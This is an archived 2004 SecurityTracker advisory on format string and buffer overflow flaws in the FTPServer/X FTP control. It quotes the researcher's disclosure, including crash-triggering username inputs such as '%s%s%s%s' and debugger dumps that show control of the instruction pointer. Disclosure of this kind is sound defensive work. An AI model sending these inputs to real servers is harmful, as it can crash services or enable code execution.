SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   FTPServer/X Vendors:   Mabry Software
FTPServer/X Format String Flaw and Buffer Overflow May Permit Remote Code Execution
SecurityTracker Alert ID:  1008667
SecurityTracker URL:  http://securitytracker.com/id/1008667
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 12 2004
Impact:   Execution of arbitrary code via network, User access via network

Version(s): 1.00.050
Description:   securma massine reported two vulnerabilities in FTPServer/X. A remote authenticated user can execute arbitrary code on the target system.

It is reported that there is a format string vulnerability. A remote user can supply a specially crafted username (such as '%s%s%s%s' or '%999d') to trigger the flaw. It may be possible to cause arbitrary code to be executed.

It is also reported that a remote authenticated user can supply a specially crafted 'mkdir' command to trigger a buffer overflow and cause arbitrary code to be executed on the target system.

The report indicated that the FTPServer/X component is used in other FTP server products such as Simple FTPServer Example, Mollensoft FTP Server, Hyperion FTP Server, and Enceladus server.

The vendor has reportedly been notified.

Impact:   A remote user or a remote authenticated user may be able to execute arbitrary code on the target system. The code will run with the privileges of the FTP service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.mabry.com/ftpserv/index.htm (Links to External Site)
Cause:   Boundary error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  FTPServer/X multiples vulnerability


hi

Ftpserver/x and a product of:http://www.marby.com It is a control OCX/COM object which 
makes it
possible to manage the users, upload, downloader, delete and and other commands ftp This 
product is used
per many commercial server  ftp on the Net, in particular:
Simple FTPServer Example
Mollensoft FTP Server
Hyperion FTP Server
enceladus server

Vulnerable ActiveX Controls:
  * FTPServer/X - FTP Server Control and COM Object version 1.00.050
marby  claims to have fixed more the share of the vulnerabilities affecting this activx 
"Response Buffer
Overflow Vulnerability"bat it appears that other vulnerabilities serieuse
  attacks of the type DOS and/or arbitrary execution of orders on the server using this 
control activX
1 - format string :
two attacks are possible:
a- traditional format string:
220 Mollensoft FTP Server 3.5.3 Ready.
Utilisateur (127.0.0.1:(none)) : %s%s%s%s

(ed0.bc0): Access violation - code c0000005 (!!! second chance !!!)
eax=20313333 ebx=0000000a ecx=20313333 edx=00000000 esi=20313334 edi=0012c924
eip=77d1ca84 esp=0012c8ac ebp=0012c8e4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
C:\WINDOWS\system32
\USER32.dll -
USER32!wsprintfA+0x11a:
77d1ca84 8a10             mov     dl,[eax]                ds:0023:20313333=??


b-Mecanisme de synchronisation de variable:
220 Mollensoft FTP Server 3.5.3 Ready.
Utilisateur (127.0.0.1:(none)) : %999d

914.8fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=ffffffff ebx=770e14e8 ecx=719923a2 edx=50e24f90 esi=0012fce4 edi=000000cd
eip=77e578ce esp=0012cd04 ebp=0012fd00 iopl=0         nv up ei pl nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010213
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
C:\WINDOWS\system32
\kernel32.dll -
par plusieurs
threads)
77e578ce f00fc101         lock    xadd [ecx],eax    ds:0023:719923a2=0000ae85

2 -buffer overflow:
a buffer overflow affects the order to mkdir  (and other command) the eip point directly 
towards the
41,42,43,44 byte of the buffer this BOF is in two times
  one has initially a exeption a:50e14331 mov [ edi], edx (edx=41414141 eax=41414141)
and
mov [edi],edx
mov ebx,[esp]
push ecx
push ebx
call ntdll!ultoa+0x1f
  ..
  ..
ntdll!RtlConvertUlongToLargeInteger+0x68:
77f7339e ffd1             call    ecx {41414141}

jusqu'a arriver a un buffer overflow classique:
eax=00000000 ebx=00000000 ecx=41414141 edx=77f733b4 esi=00000000 edi=00000000
eip=41414141 esp=0012bb50 ebp=0012bb70 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
41414141 ??               ???

mabry is contacted without answer

securma massine

greetz:anasoft simo abder marocit and crack.fr

Pour gagner une Playstation 2, envoyez un SMS avec le code PS au 61321 (0,35 euro hors 



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC